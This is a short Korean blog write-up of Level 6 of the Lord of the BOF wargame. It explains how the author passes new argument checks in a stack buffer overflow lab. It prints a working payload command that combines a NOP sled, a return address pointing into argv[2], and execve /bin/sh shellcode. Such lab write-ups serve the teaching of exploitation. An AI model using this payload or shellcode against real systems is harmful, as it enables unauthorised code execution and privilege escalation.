ii4gsp
LOB - Level6 [wolfman -> darkelf] 본문
이전 문제에서 조건이 하나 추가되었다.
argv[1]의 48번째 바이트가 \xbf가 아니라면 프로그램이 종료되고
argv[1]이 48이상이라도 프로그램이 종료된다.
gdb로 열어서 strcpy() 함수 다음명령인 <main+242>부분에 break point를 걸어주었다.
argv[2]의 주소를 0xbffffc14로 잡아주고 페이로드는
(buffer + sfp + argv[2]) + (nop+ shellcode)가 된다.
payload
./darkelf $(python -c 'print "\x90" * 44 + "\x14\xfc\xff\xbf"') $(python -c 'print "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"')'시스템 해킹 > LOB' 카테고리의 다른 글
| LOB - Level8 [orge -> troll] (0) | 2020.01.16 |
|---|---|
| LOB - Level7 [darkelf -> orge] (0) | 2020.01.15 |
| LOB - Level5 [orc -> wolfman] (0) | 2020.01.14 |
| LOB - Level4 [goblin -> orc] (0) | 2020.01.14 |
| LOB - Level3 [cobolt -> goblin] (0) | 2020.01.13 |
'시스템 해킹/LOB' Related Articles
more
Comments